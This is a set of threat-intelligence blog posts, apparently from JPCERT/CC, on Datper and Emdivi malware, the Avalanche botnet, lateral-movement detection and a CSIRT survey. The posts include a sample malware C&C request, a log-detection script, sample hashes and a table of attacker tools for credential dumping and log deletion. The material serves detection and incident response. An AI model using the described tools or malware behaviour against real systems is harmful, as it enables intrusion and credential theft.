31 posts categorized "#Trends in Japan" Feed

Aug 21, 2017

Detecting Datper Malware from Proxy Logs

This is Yu Nakamura from Analysis Center.

This entry is to explain features of Datper, malware used for targeted attacks against Japanese organisations and how to detect it from the logs.

JPCERT/CC has been observing attacks using Datper since around June 2016. Research reports on the adversary are published from LAC [1], SecureWorks [2] and Palo Alto Networks [3]. The adversary had also conducted attacks using Daserf malware in the past, and Symantec refers to them as “Tick” in their report [4].

Attack vectors

We have confirmed that Datper infection occurs by:

  • Drive-by download attacks
  • Exploiting vulnerabilities in asset management software

In the former attack vector, we observed that a vulnerability of Adobe Flash Player (CVE-2016-7892) was leveraged for downloading and executing Datper. For the latter, there were cases where devices also got infected with a downloader called “wali”. Some analysis of this downloader has been published by Kaspersky [5] and Cybereason [6]. We have seen that wali can download several types of malware, and Datper is one of them.

Detailed behaviour

Datper communicates with a C&C server using HTTP protocol and operates based on the received commands. One of the characteristics is that it only communicates within a specific period of time.

Here below is a sample HTTP request that Datper sends to a C&C server. User-Agent is hard-coded in the malware.


GET /hoge/index.php?fnyup=940785246f0c22b41joikeddfngjokyptui HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: [host name]
Pragma: no-cache
Connection: close

The malware receives a command as a response to the above HTTP request, and it executes functions based on the commands. Functions that Datper can execute are the following:

  • Obtain host names, OS versions etc.
  • Obtain drive information
  • Configure communication intervals
  • Sleep for a set period of time
  • Execute a program
  • Operate on files (Obtain file lists, download, upload, delete)
  • Execute shell commands

After executing these functions, Datper sends the results to a C&C server.

How to detect Datper’s communication

Datper sends HTTP GET requests with two types of query strings as in format 1 and 2 in the following figure.

Figure 1: Query string formats
Figure1

As in the Figure 1, <a>, <b> and <c> in the query strings vary for each communication. If the fixed value which comes after <c> is “1” (as in format 1 in the Figure), it represents a request for commands, while those with “2” (format 2 in the Figure) are sent when sending command execution result to a C&C server. Command execution results are contained in the encrypted data. When the encrypted data is larger than 1024 bytes, POST method is used instead of GET.

Strings as in the above Figure is typical for Datper’s communication and barely observed during usual web browsing. Based on the characteristics, it is possible to detect Datper’s communication by checking for logs that match the format - that strings are aligned in the order of <a>=<b><c> format and <b>’s CRC32 value matches <c>. For easy verification, the following is an example of Python script for checking proxy server logs. Regular expressions need to be modified according to the log format.


import re
import sys
from binascii import crc32
from ctypes import c_uint

filter_1 = re.compile('(http://[\da-z\.-]+\.[a-z\.]{2,6}/[\/\w_\.-]+\?[\da-z]{3,8}=([\da-f]{8})([\da-f]{8})[1-2]{1}\S+)\s', re.IGNORECASE)

def main():
    for line in sys.stdin:
        m1 = filter_1.search(line)
        if m1:
            url = m1.group(1).lower()
            d1 =  m1.group(2).lower()
            d2 =  m1.group(3).lower()
        else:
            continue
        d1_crc32 = "%08x" % c_uint(crc32(d1)).value
        if d1_crc32 == d2:
            print "hit: %s" % line            
if __name__ == '__main__':
    main()

Change in compression algorithm

As mentioned above, Datper’s communication contains encrypted data. More precisely, plain text data is compressed, encrypted and then encoded. As for the compression algorithm, LZNT1 had been used, however, it was replaced with LZRW1/KH around November 2016. Below is the list of compression and encryption methods that Datper uses.

Table 1: List of compression and encryption methods
  Compression algorithm Encryption algorithm Encode algorithm
Datper (Until October 2016) LZNT1 RC4 Base64 (alternative table)
Datper (After November 2016) LZRW1/KH xor + RC4 Base64 (alternative table)

The adversary has often used LZNT1 for attacks using Datper and other types of malware (xxmm/Minzen). While LZNT1 is easy to use with a Windows API “RtlDecompressBuffer”, LZRW1/KH is not covered in Windows API. The reason for this inconvenient choice is unclear, however, this change together with the slight update in the encryption algorithm may be due to the intention of the adversary to disturb the malware analysis processes.

Conclusion

The adversary using Datper had conducted targeted attacks using Daserf malware for a long period of time against Japanese organisations. Activity with Datper is also likely to continue for a while, and we will carefully watch the malware and its attack activity.

- Yu Nakamura

(Translated by Yukako Uchida)

References

[1] CYBER GRID VIEW Vol.2 | Security Information | LAC Co. Ltd. (Japanese)

  http://www.lac.co.jp/security/report/pdf/20160802_cgview_vol2_a001t.pdf

[2] A whole picture of cyber attacks targeting Japanese companies – BRONZE BUTLER (Japanese)

https://www.secureworks.jp/%7E/media/Files/JP/Reports/SecureWorksBronzeButlerReport.ashx

[3] “Tick” Group Continues Attacks

  https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/

[4] Tick cyberespionage group zeros in on Japan

  https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

[5] Old Malware Tricks To Bypass Detection in the Age of Big Data – Securelist

https://securelist.com/blog/research/78010/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/

[6] ShadowWali: New variant of the xxmm family of backdoors | Cybereason

https://www.cybereason.com/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors/

Appendix A SHA-256 Hash value of Datper Samples
  • Datper(LZNT1)

efa68fcbd455a72276062fb513b71547ea11fedf4db10a476cc6c9a2fa4f67f7

12d9b4ec7f8ae42c67a6fd030efb027137dbe29e63f6f669eb932d0299fbe82f

331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b

90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2

2384e8ad8eee6db1e69b3ee7b6b3d01ae09f99a86901a0a87fb2788c1115090c

7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849

  • Datper(LZRW1/KH)

7bc042b9a599e1024a668b9921e2a42a02545429cf446d5b3d21f20185afa6ce

1e511c32cdf8abe23d8ba7c39da5ce7fc6c87fdb551c9fc3265ee22ac4076e27

2f6745ccebf8e1d9e3e5284a895206bbb4347cf7daa2371652423aa9b94dfd3d

Aug 04, 2017

What the Avalanche Botnet Takedown Revealed: Banking Trojan Infection in Japan

Internet banking services across the globe have been exposed to the threat by unauthorized money transfers and suffering large-scale losses.

In this landscape, an operation led by international law enforcement agencies has been in effect since November 2016 to capture criminal groups conducting unauthorised online banking transfers and dismantle the attack infrastructure (the Avalanche botnet). JPCERT/CC is one of the many supporters of this operation.

For more information about the operation, please see below:

Europol Press Release:

‘Avalanche’ network dismantled in international cyber operation

https://www.europol.europa.eu/newsroom/news/%E2%80%98avalanche%E2%80%99-network-dismantled-in-international-cyber-operation

Interpol:

‘Avalanche’ network dismantled in international cyber operation

https://www.interpol.int/News-and-media/News/2016/N2016-160

This blog entry presents how JPCERT/CC supports this operation and the current state of malware infection in Japan revealed through our local coordination.

JPCERT/CC’s activities in the operation

Some organizations in support of this operation register domains related to the Avalanche botnet to observe communication between any infected devices and the DNS sinkhole. From all the observed data, CERT-Bund (the National CSIRT of Germany) provides information related to Japanese networks to JPCERT/CC. We then notify administrators of the infected hosts to request investigation and coordination to address the issue.

Characteristics of infected devices in Japan

Figure 1 shows the number of malware infected hosts linked to the Avalanche botnet, which were observed between 5 December 2016 and 31 May 2017. Note that extreme spikes caused by irregularities such as dates without any received data are excluded from the graph.

Figure 1: Number of malware infected hosts in Japan (per day)
Avalanche_01_en

In December 2016, when we first received data on the Avalanche botnet, there was a daily average of about 17,000 hosts communicating with the DNS sinkhole. However, it decreased to about 11,000 hosts per day at the end of May 2017, thanks to cooperation from our local partners.

In addition, multiple malware families have been observed within the Avalanche botnet. From the data, JPCERT/CC received between 5 December and 4 January, the ratio of malware observed in Japan was as follows:

Figure 2: Ratio of malware (linked to the Avalanche botnet) found in infected hosts in Japan
Avalanche_02

Rovnix, KINS, Shiotob (a.k.a. URLZone, Bebloh) are known as malware that harvest credentials for Internet banking services. We have confirmed that Rovnix and Shiotob were distributed as attachments to spam emails written in Japanese in 2016.

Conclusion

Through this operation, many infected hosts in Japan have been isolated from the botnet, which resulted in the decreasing trends as in Figure 1. However, besides the malware families hosted in the Avalanche botnet, other types of banking trojans such as Ursnif (or DreamBot) have also been distributed recently through spam emails written in Japanese. JPCERT/CC continues to alert local constituents about these threats.

- Shintaro Tanaka

(Translated by Yukako Uchida)

Jul 05, 2017

Clustering Malware Variants Using “impfuzzy for Neo4j”

In a past article, we introduced “impfuzzy for Neo4j”, a tool to visualise results of malware clustering (developed by JPCERT/CC). In this article, we will show the result of clustering Emdivi using the tool. Emdivi had been seen until around 2015 in targeted attacks against Japanese organisations. For more information about Emdivi, please refer to JPCERT/CC’s report.

Clustering Emdivi with impfuzzy for Neo4j

Emdivi has two major variants - t17 and t20, and we chose the former for this analysis. Figure 1 shows the output of running impfuzzy for Neo4j.

Figure 1: Emdivi t17’s clustering result using impfuzzy for Neo4j
Fig1

As a result of the analysis, 90 samples were clustered into 4 types. Figure 2 visualises the clustering results. Detailed results are documented in Appendix A. (For detailed instructions on the tool, please see our past blog article.)

Figure 2: Visualised result of Emdivi t17 clustering (Colouring provided for better understanding.)
Fig2

It stood out that each cluster (Type 1 through Type 4) highly corresponds to the compiled date of the malware sample (see Appendix A).

Hash values of malware samples are generated by impfuzzy (Import API), which is then used to calculate the similarity. Therefore, the reason for this type clustering is unknown solely from this analysis. Manual analysis is required to examine what makes Import APIs different in each type.

The following sections will describe the reason why Emdivi t17 samples were clustered into 4 types and how the transition occurred from one type to another.

From Type 1 to 2

The clustering results in Appendix A indicate the transition from Type 1 to 2 occurred around September 2014. We noticed a change in linker versions.

PE files have header information called IMAGE_OPTIONAL_HEADER[1]. This contains MajorLinkerVersion and MinorLinkerVersion, which indicates its linker version. Looking into the linker version used when creating Emdivi t17, Type 1 mainly uses 10.0 (Visual Studio 2010) while Type 2 uses 9.0 (Visual Studio 2008). It is considered that these samples were differentiated due to the change in the linker version, which accordingly changed the Windows APIs that the malware loads.

From Type 2 to 3

It was around November 2014 when Type 2 changed to Type 3, and this transition reflects the change in the method of loading Windows API. Usually, PE file loads Windows API upon execution by specifying an API name in Import Name Table (INT) inside the PE header. (Please refer to a past blog article for more information.)

However, Type 3 samples possess some obfuscated Windows API names and load it when using Windows API. Figure 3 is the results of decoding obfuscated strings in Emdivi t17, which indicates that Type 3 contains some obfuscated Windows API names (marked in red).

Figure 3: Comparison of decoded strings in Emdivi t17 clustered as Type 2 and 3
Fig3_eng

The Windows APIs obfuscated in Type 3 are deleted from its INT. This means that the Windows API that the malware aims to execute cannot be identified by just looking at the INT.

This change in Windows API load method is thought to be the reason for the difference between Type 2 and 3.

From Type 3 to 4

Transition from Type 3 to 4 occurred around May 2015. This is due to a new bot (remote control) function being added. Here is the list of bot functions that Type 4 has. “GOTO” is the new function to Type 4.

  • GOTO
  • DOABORT
  • DOWNBG
  • GETFILE
  • LOADDLL
  • SETCMD
  • SUSPEND
  • UPLOAD
  • VERSION

The added bot function resulted in new Windows APIs being used, which distinguishes Type 4 from 3.

Summary

It is not practical to manually analyse a large number of malware samples. It is rather important to automate malware clustering process to find new types of malware and changes in malware features. With the analysis example, we demonstrated an example of effective malware analysis using impfuzzy for Neo4j by focusing on samples with different features. The tool is available on Github, and we hope this helps your malware analysis.

- Shusei Tomonaga

(Translated by Yukako Uchida)

Reference

[1] Microsoft: IMAGE_OPTIONAL_HEADER structure

Appendix A Emdivi t17 Clustering Results
Table 1: List of Emdivi t17 Clustering Results
No. Compile Time EmdiviVersion LinkerVersion Type SHA256
1 2013-11-21 17:00:52 t17.08.2 10.0 1 6b0192ec4f0290c0c00517eeb75648e340dacc58189d9d6adee844283cda4a5f
2 2013-12-24 12:13:21 t17.08.2 10.0 1 c162df8761e09c95160e9d432d310a4673d53615c2ff837a1a6f322e45038180
3 2014-01-06 11:33:48 t17.08.2 10.0 1 bf8cba80f4d80e13f11c8231477f0b96c3a9e9abc8da798e6cede052f6801aa8
4 2014-01-06 11:48:05 t17.08.2 10.0 1 742c70238ea0b2b0a1d66660913b18deaff2af35c6dc5b19e9d2158249cae433
5 2014-01-19 16:12:41 t17.08.2 10.0 1 18dfb3ff38c802f54c66c7d06380e7aff4834ac7a0c9ea35e50f46cf40266c3a
6 2014-01-21 12:29:03 t17.08.2 10.0 1 08a542fe7f8450d2c66b5e428872860d584bc5be714a50293a10aef415310fe8
7 2014-01-21 20:07:01 t17.08.2 10.0 1 bf9229b342c144970358308ccb017802cb2ff5c2086bf0367d9d72f34556b7c1
8 2014-01-23 16:32:01 t17.08.2 10.0 1 2bf87ec696356a685b081b9e0aec88c3ac3e3353927f712e978db0d2f5a9476b
9 2014-02-28 10:52:43 t17.08.5 10.0 1 396c7766eb8873227c270eae2b13357dbcd68fa7f07053dd280375418eeee614
10 2014-03-13 13:05:13 t17.08.9 10.0 1 138e7c2e5cf0caba02d005752686a66482df23f4b4b648f446f2afada32a5750
11 2014-04-01 12:08:03 t17.08.9 10.0 1 4df19e155cac0735500cffae49007b3d971979cccca779a5af685db489b4b042
12 2014-05-07 13:52:46 t17.08.10 10.0 1 b97ab11d1154fae07d2cfab055cdc6b745a5117fc1d8e557f6a244040ba7cce3
13 2014-05-08 12:22:24 t17.08.10 10.0 1 04b9a6ef5ef6cdaf42e90431039bd56b68082c5056889cf4b9ababc6e0834b56
14 2014-05-11 15:44:46 t17.08.9 10.0 1 83620f29a19a4d372e256d98ebfd2d3e5cb4b8db97b385c2942914298b8d2870
15 2014-06-03 10:41:46 t17.08.9 10.0 1 4422d1568f729c316e8d02a35fe147c4c36c91d650989e9ac3caa6fbbc086b37
16 2014-07-17 10:48:24 t17.08.9 10.0 1 e7ae0995e3d4dd9c3fed51d5bca73ea9fa3edd90e2e87fc0cfac58165afdf4e8
17 2014-07-22 17:40:31 t17.08.9 10.0 1 7875c21473cf5f8d936f1335c049ae6df9e0b0574b263060d7a526f3d53cbf07
18 2014-07-28 18:01:59 t17.08.16 10.0 1 c805af2204c1d8612cd929b93fc5c38a448a03561d410d7a198c313553e47e39
19 2014-08-04 13:57:34 t17.08.16 10.0 1 3243925baa06dc69731da91da49242fd73aea38afe46e171708de4ecd4e53b80
20 2014-08-05 12:51:43 t17.08.18 8.0 1 92860e0a9e7dc49c43a0db87d4fb345294000ac3191af1dc6d702b89628c97eb
21 2014-08-06 09:22:32 t17.08.16 10.0 1 df97dd9607f0fdcc10f9ba99e6c3d01eb8453ceeeab840ef6b965458e24485bc
22 2014-08-12 18:09:41 t17.08.16 10.0 1 d26eb51e2787353b18c8f290f0710510423e3925a796697ff15aafd14fea6f2d
23 2014-08-18 12:21:10 t17.08.16 10.0 1 37f43f9c4298dc41f6b1ed03396cc1f7da664ed25e97c4263e6c360f59f3a51b
24 2014-08-19 20:01:29 t17.08.16 8.0 1 9fc76d0fb4f01819c0d9af09a0357dab6c33a4d5f6e41cafebeb9ef7ae35c99e
25 2014-09-09 13:34:21 t17.08.18 9.0 2 f017218f05d225cdb62f3081c4dac4b09a3fb2b93c01096bd4141b67d3eb3bbf
26 2014-09-18 09:26:42 t17.08.18 9.0 2 139e22abe7aaec635e2b570935636c4894a19a7b284516b77f190b78a369c4d6
27 2014-09-22 09:51:33 t17.08.18 9.0 2 a00e37d1d3fe990ebac26a4805a7ab42bd1dcf7ef65f151906204eee7b0c71fd
28 2014-09-25 10:34:10 t17.08.18 9.0 2 3d084155e6f79b45acba165cd4a17a3bed42daba478c14a795dc2c2809f302b6
29 2014-09-28 20:52:36 t17.08.18 9.0 2 196364b3e78add557b6f0471fb32061468bb2b20e16acd1a7686122234c984a7
30 2014-09-30 12:10:55 t17.08.21 9.0 2 8c3666940afd65835e4251fbd14942d210323d46adf57c5e8f29b61d552fd386
31 2014-10-07 11:50:57 t17.08.21 9.0 2 878937da134339ccd8c6bbc5ac020472c20a42fb1f07b56152cfcc1656077d62
32 2014-10-08 18:31:01 t17.08.21 9.0 2 b99f08be6a476d359820c48345ddf4f2f0fcc1ca041f3630680635c675a1d7be
33 2014-10-21 15:13:53 t17.08.21 9.0 2 1209d8b3c83c72df781b805a2c17a0939c841384aadc32e4e9005536a3bba53f
34 2014-10-24 17:16:08 t17.08.21.3 9.0 2 c89823eba2bdcdfcae33b33fb358154debe3fd88c75c684aa6b510e2d4b3ca53
35 2014-10-27 10:29:00 t17.08.21 9.0 2 884cbc1f0e70efae4815127bda7bab50883a707581d9d4061d268249c154ff2d
36 2014-10-28 12:48:54 t17.08.21 9.0 2 682b6c9d468e8d0ab8b5d4080cecf52a9dd66b59b99936a4941b8190c5f3fff9
37 2014-11-04 19:15:32 t17.08.23 9.0 3 23449109f0d4b07fd8010bb36b3b1084b48d5ac515725b68bf32322b4902397e
38 2014-11-05 21:15:57 t17.08.23 9.0 3 a79cfba79489d45a928ef3794d361898a2da4e1af4b33786d1e0d2759f4924c3
39 2014-11-05 22:00:42 t17.08.23 9.0 3 9801caaf44ce9a6be3f497e706f5b71dcc7c50351374c33dc2c9fcbb55f55e05
40 2014-11-06 13:55:46 t17.08.23 9.0 3 b19a233b07a1342f867aef1b3fb3e473b875bd788832bb9422cacb5df1bda04e
41 2014-11-13 10:52:56 t17.08.23 10.0 1 6c4c3bc7b0dfe531790bfb023b141c23f3c17a9971fed704d1b46e43f97d41c1
42 2014-11-13 11:34:31 t17.08.23 10.0 1 21a51f69d08aaf0aaaeb5b8413bb710c1727d9d08a9a1f46883f6f93691e0870
43 2014-11-14 13:10:40 t17.08.25 9.0 3 28a774235865924a7fec405aaf6463164a03f6e646c9fd964c3191304e59d35b
44 2014-11-18 11:56:13 t17.08.25 9.0 3 29a480579353c85e48b996ebc38cad9313ad6b9e495a3a69bf1519837acab04f
45 2014-12-08 15:19:29 t17.08.25 9.0 3 34bc147423f565bf38100913d25f85057e252755eef622abc1b788d511caf605
46 2014-12-11 18:28:38 t17.08.25 9.0 3 a188b87e495e4b0aad0d0595987677f9758479b120fb2ed3a04fba308a66830a
47 2014-12-16 18:13:13 t17.08.25 9.0 3 e39b1b36a5da4ad0f9c103478ab469b13a0528540ddbd1679eb24349a6726dbf
48 2014-12-24 10:37:26 t17.08.25 9.0 3 037b0dbfc2643a4a4779f6e3a8e5c8c41cbcd64533d2245c9a26dfd1d4f55dd8
49 2015-01-12 11:58:46 t17.08.25 9.0 3 9e74825e251a4f4cef9bc98273082f3b58695a224b1ed16ba6dedaa4c154cb21
50 2015-01-20 11:10:12 t17.08.26 9.0 3 5e221bd0eef231b7a948d8f6a2f660f8d6685cf2711fe50311485227ebcf9e51
51 2015-01-20 11:59:37 t17.08.26 9.0 3 635b43f7c0508f5e2cbf26f81daf0a730a0f0b06303c54c747b780f91430bb7f
52 2015-01-22 11:25:49 t17.08.26 9.0 3 efa57d43145de9a1e3c7541f94837a9c7b76d604b779d9847637d4a55b1ee723
53 2015-01-22 16:06:33 t17.08.26 9.0 3 9ace48ecef568bb9f5ccd462ca3efb4c2fbc15f0316323f1729e88cbe184158d
54 2015-01-23 10:14:46 t17.08.26 9.0 3 42e6b7afe4da672ab9bf647e73201135b3faf2121b629612b35307dc0d8698e4
55 2015-01-26 10:15:10 t17.08.26 9.0 3 9ebef65f00fc6ad70f591f7fb1f39f0f6b1766ff3fd9f47693ce669e70f84abb
56 2015-02-03 11:35:23 t17.08.26 8.0 3 6aed51b108d9f9f197842e17b0f58d4dec3709ca1eae4d42146d0bba0c145eaf
57 2015-03-02 10:18:13 t17.08.27 9.0 3 f6fce0464f1ad8044092e6812bdfb8545e1df5ee23aba828b4dcb86fb6d0e62b
58 2015-03-04 13:08:13 t17.08.27 9.0 3 fca765c535d1870d71ee152e5b004e73515ade1ee1c9a512a0858a508380465d
59 2015-03-05 12:59:51 t17.08.27 9.0 3 eac8441227077edb28adf096c5493710e2ca1978f4e4c4b2b93d481cd482d890
60 2015-03-17 12:50:29 t17.08.27 9.0 3 9f66ad282373b8b0df45dd32723dcdfcd4821e22cba4912678c3c8632e722730
61 2015-03-19 16:03:19 t17.08.27 9.0 3 77fa012060884d17eea1e54d97176a7a88c499f03315dfd602c1e1e17e556ede
62 2015-03-20 11:44:49 t17.08.27 9.0 3 3cade660e227faadad0060d793b69cb778842a514ac6996bc6aaddb6a055f445
63 2015-03-20 13:04:19 t17.08.27 9.0 3 6c3b955ad677ff26428d95a35b3a22ca3d523265674f08b6a0b59df270e6bf19
64 2015-03-24 13:07:23 t17.08.27 9.0 3 400a08b4a067b1e2fb3bee509bf933a746cf3ef2d000bb3181c7176344641a01
65 2015-04-22 12:29:48 t17.08.29 9.0 3 e3a2d62a997d4e9ee581fd86d312ac34caddd3165c07ca30c6741b4c21088d08
66 2015-04-24 12:07:43 t17.08.29 10.0 1 782b3bed336eab77a49df51e697bc64d830f7f11a32ff49abc599fe5b074e0b9
67 2015-05-20 12:52:28 t17.08.30 9.0 4 e03e6f7d98b214b5051b7484e4099ce5bd8c46e49faf44002c8ba146977127ef
68 2015-05-21 16:38:39 t17.08.30 9.0 4 28426751f30de4091dee898c70f49ec2ece607b6b642b45f5dcd9ae73ac38739
71 2015-05-22 12:51:18 t17.08.30 9.0 4 09178fa9c4be32982619a183b8b76bfc2ff57486aac04c8fed654a4d9fe91436
69 2015-05-22 12:51:18 t17.08.30 9.0 4 cb3976965f2105492193889f3f58f2ef2ccfeb8604e2b9448055ec6608d4aa85
70 2015-05-22 12:51:18 t17.08.30 9.0 4 de8759fe34eb2f395574be79479832402aa4d113e102d6945df493abee3d8b34
72 2015-05-28 13:48:14 t17.08.30 9.0 4 05ef4e0de8d57e6cd10d1673fcfca9c03b6e9a271d54028781e96235c4530e15
73 2015-06-02 12:15:26 t17.08.30 9.0 4 07b7041016c16341ea1f35a8c5fb5312d15f089ed5e925f78ffdd2568a8cf17c
74 2015-07-06 11:34:56 t17.08.31 9.0 4 c59ebe1fa6abe52c85f5f56a7da810a35e44c4772746bc829fa7d9e4e6a59477
75 2015-07-10 09:40:15 t17.08.31 9.0 4 3e850306025c231f09fa1922d1bb8e1a40bd8acc142d92219d9e9c8f8911b77d
76 2015-07-10 10:58:16 t17.08.31 9.0 4 008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e
77 2015-07-13 01:23:13 t17.08.31 9.0 4 e919ae6a3bdc6abe6b695215a53b74072a39b86757e049f930866b3f69000957
78 2015-07-13 11:46:27 t17.08.31 9.0 4 567fa6bf28862ce7d14a2f3cf5b718780213fa3ee73f59557c29525f8daa200c
79 2015-07-14 10:57:44 t17.08.31 9.0 4 a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d
80 2015-07-14 11:16:54 t17.08.31 9.0 4 5a30f9010a316cc74ed271e732741c6d5d38f0e1c6f3b547176adcd40cb547ae
81 2015-07-14 18:44:14 t17.08.31 9.0 4 bfcd987ca3e79bd7ba8dde95a392dbba02ffa30242954a0cfa35ec81182f0cc8
82 2015-07-16 10:10:07 t17.08.31 9.0 4 3caf60dd3bb551d4da244dffaeb68fe01b59cd19bd0f0509611b706048b3382f
83 2015-07-28 13:56:35 t17.08.31 9.0 4 280371475442917b782f6a834003313f3aa0e5bb65f0acac5aab673d04336ba4
84 2015-08-05 09:51:31 t17.08.31 9.0 4 3cebf71221af741ea0b0883b45c092f900b513de3a004f81d3c595648311b7e9
85 2015-08-07 10:23:11 t17.08.34 8.0 4 90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86
86 2015-08-13 09:48:01 t17.08.34 8.0 4 6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662
87 2015-08-13 10:35:15 t17.08.34 8.0 4 17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24
89 2015-08-19 10:16:01 t17.08.34 8.0 4 22957429e8ab527ff8bb45fbc50aa8400ea643a68de8d43da3fee3239e2159d4
88 2015-08-19 10:16:01 t17.08.34 8.0 4 3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1
90 2015-10-13 10:52:52 t17.08.34 8.0 4 e68e835904aaef2da5b38e9532036117996d58d3fba05cbe454f9d418be60ef4

Jun 12, 2017

Research Report Released: Detecting Lateral Movement through Tracking Event Logs

JPCERT/CC has been seeing a number of APT intrusions where attackers compromise a host with malware then moving laterally inside network in order to steal confidential information. For lateral movement, attackers use tools downloaded on infected hosts and Windows commands.

In incident investigation, traces of tool and command executions are examined through logs. For an effective incident investigation, a reference about logs recorded upon tool and command executions would be useful.

JPCERT/CC conducted a research on typical tools and commands that attackers use after intrusion, and traces that they leave on Windows when executed. The result of the research is available on the report below:

Detecting Lateral Movement through Tracking Event Logs

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

This entry will introduce the overview of the report.

Intended Audience

This report is designed for technical staff including those responsible for initial investigation of incidents. Even without forensic software or knowledge in forensics, readers capable of examining event logs and registry entries can understand the contents.

Tools and Commands

44 typical tools and commands have been featured on the report (as described in Appendix A) based on what JPCERT/CC has seen in multiple incident cases. Since these tools and commands are used by multiple attackers, it is likely that analysts encounter some of them during incident investigation.

Need for Detailed Logs

Under the default configuration of Windows, many of these tools and commands are not logged. In order to investigate what attackers did during the incident, preparation for log retention is necessary. The report describes how to record tools and command executions by setting audit policy and installing Sysmon. Other than the methods explained in the report, it is also possible to collect such logs with audit applications or EDR products.

Way Forward

We are planning to examine other tools and commands as well. In addition to event logs and registry entries, we will also look into forensic artifacts such as MFT and journal files.

We welcome any feedback from you at global-cc [at] jpcert.or.jp.

-         Shusei Tomonaga

(Translated by Yukako Uchida)

Appendix A:  Examined Commands and Tools
Table 1: List of Examined Commands and Tools
Attacker's Purpose of Using ToolTool
Command execution PsExec
wmic
PowerShell
wmiexec.vbs
BeginX
winrm
at
winrs
BITS
Obtaining password hash PWDump7
Quarks PwDump
mimikatz
WCE
gsecdump
lslsass
Find-GPOPasswords.ps1
Mail PassView
WebBrowserPassView
Remote Desktop PassView
PWDumpX
Malicious communication relay
(Packet tunneling)
Htran
Fake wpad
Remote login RDP
Pass-the-hash
Pass-the-ticket
WCE
mimikatz
Escalation to SYSTEM privilege MS14-058 Exploit
MS15-078 Exploit
Privilege escalation SDB UAC Bypass
Capturing domain administrator
rights account
MS14-068 Exploit
Golden Ticket (mimikatz)
Silver Ticket (mimikatz)
Capturing Active Directory database
(Creating a domain administrator user or
adding it to an administrator group)
ntdsutil
vssadmin
Adding or deleting a user group net user
File sharing net use
net share
icacls
Deleting evidence sdelete
timestomp
Deleting event log wevtutil
Obtaining account information csvde
ldifde
dsquery

May 12, 2017

Fact-finding Report on the Establishment and Operation of CSIRTs in Japan

Hello, this is Misaki Kimura from Watch and Warning Group.

JPCERT/CC conducted “Survey on the Establishment and Operation of CSIRTs in Japan” in the end of 2015. Following the Japanese report released in 2016, we have just released the English version of the report on JPCERT/CC website to share the outcomes with the information security community member all around the globe. Although the basis of social composition, culture, organizational constitution and so on may differ in each economy, we hope that this document will serve as a useful reference in terms of establishing a CSIRT or comparing the situation with those organizations in overseas.

Here in this blog will cover an executive summary of the report.

Background of the survey

Cyber attacks in recent years have become increasingly diverse in terms of their aims, targets, and TTPs (Tactics, Techniques, and Procedures) used that the impact can be large enough to shake the foundation of a business. One approach that is drawing attention is to establish a Computer Security Incident Response Team (CSIRT) that will serve as the linchpin of an organization to effectively handle security incidents. Cybersecurity Management Guidelines released from Ministry of Economy, Trade and Industry in December 2015 also referred to the need to establish CSIRTs, and this has been boosting the number of CSIRTs in Japan.

Cyber security communities, including the CSIRT community, are quite active in Japan. Nippon CSIRT Association (NCA) is the venue for local CSIRTs to come together for information sharing and joint activities, which has 232 member organizations (as of May 2017). JPCERT/CC conducted the survey targeting 66 organizations which belongs to NCA with an aim to assist those who wish to establish a new CSIRT by compiling the facts of CSIRT activities in various local organizations. The survey took place in December 2015, by means of a questionnaire and interviews, covering questions on organizational structure, scale, functions, policies and other various aspects of CSIRTs. Here below will introduce some interesting findings described in the report.

Items to be defined upon establishing a CSIRT

Business activities, scales, department structures, and anticipated risks differ according to the organization. For this reason, based on the results of the survey, the following six items were identified as matters that organizations should define upon establishing an internal CSIRT.

  • Scope of services provided by CSIRTs
  • Authority granted to CSIRTs
  • Deployment and members of CSIRTs
  • Point(s) of contact (PoC)
  • Reporting structure to effectively communicate the effects of CSIRT activities within the company
  • Periodic review of CSIRT activities

 Among these, I would like to highlight a few findings of the survey, which are considered noteworthy for organizations in overseas as followings;

Scope of services provided by CSIRTs

A CSIRT is required to receive, review and respond to various incident reports. Therefore, scope of its service such as contents, targets, range of responsibility, and so forth need to be considered.

NCA categorizes services offered by CSIRTs roughly into the following three types: reactive services, proactive services, and security quality control services. Of these three categories, the survey results identified the main services provided by CSIRTs in each category as follows;

 - Reactive services
  • More than 80% answered "Incident handling," "Issuing security alerts" "Log Analysis" and "Vulnerability handling" are provided to respond promptly in the event of an incident
 - Proactive services
  • More than 80% answered "Security warning announcement” is provided ahead of an incident
  • Nearly 70% answered "Provision of security related information" and "Intrusion detection" are provided to monitor any signs of an attack
 - Security quality control services
  • More than 70% answered "Conducting awareness raising activity", "Organizing educational programs" and "Consulting security related issues" as a service aimed at increasing the knowledge and skills to respond to cyber security

In some CSIRTs, all of these services are provided whereas some CSIRTs only provide one or two of those. It is not the variety of services they provide that matters to a CSIRT, but the capability to provide the kinds of services that the organization needs.

Also, the results of the survey showed that about 60% of the organizations has documented their service definition, and over 80% of the organizations has defined and documented their security policies that were approved by the management.

Authority granted to CSIRTs

In responding to security incidents, it is necessary as an organization to make appropriate and timely decisions. While CSIRTs are in a position to provide assistance to departments or persons for decision-making, it is important to understand about up to what point a CSIRT authority is granted.

For example, when a system needs to be suspended for risk avoidance in the event of an urgent incident, about 12% of the CSIRTs answered that they themselves have the authority to order the systems to be stopped, while 85% of the CSIRTs answered that they do not have the authority to order but are in a position that allows them to advise on the decision-making.

Figure 1. Authority of the CSIRT in the event of an incident
Figure1

